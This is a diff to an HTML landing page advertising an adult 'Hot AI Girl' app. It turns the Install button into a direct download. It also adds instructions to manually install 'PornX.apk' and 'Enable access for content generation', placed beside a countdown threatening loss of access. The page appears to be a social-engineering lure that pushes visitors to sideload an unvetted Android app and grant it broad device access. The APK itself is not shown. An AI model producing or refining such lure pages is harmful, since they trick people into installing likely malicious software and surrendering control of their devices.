--- a/index.html
+++ b/index.html
@@ -34,7 +34,7 @@
                     <p>Hot AI Girl</p>
                 </div>
             </div>
-            <a class="install-btn" target="_blank" href="./manual.html">Install</a>
+            <a class="install-btn" target="_blank" download="#" href="#">Install</a>
 
             <div class="card-block">
                 <div class="card-block__item">
@@ -54,7 +54,42 @@
             <h4 class="access">Access will be denied through</h4>
 
             <p class="timer"></p>
-		</div>
+
+
+            <div class="main main-manual">
+        <div class="step-one">
+            <h2 class="manual__title">First</h2>
+            <div class="instruction">
+                <p class="instruction__text">Open PornX.apk and install it manually</p>
+            </div>
+        </div>
+
+        <div class="step-two">
+            <h2 class="manual__title">Next</h2>
+            <div class="instruction">
+                <p class="instruction__text">Enable access for content generation</p>
+            </div>
+            <div class="manual__block">
+                <div class="manual__item"></div>
+                <div class="manual__item"></div>
+            </div>
+        </div>
+
+        <div class="step-three">
+            <h2 class="manual__title  manual__title-small">And finally</h2>
+            <div class="instruction">
+                <p class="instruction__text">Access magical bliss with AI technology!</p>
+            </div>
+            <div class="manual__block  manual__block-small">
+                <div class="manual__item  manual__item-small"></div>
+                <div class="manual__item  manual__item-small"></div>
+                <div class="manual__item  manual__item-small"></div>
+            </div>
+        </div>
+    </div>
+
+
+	</div>
 
 
 
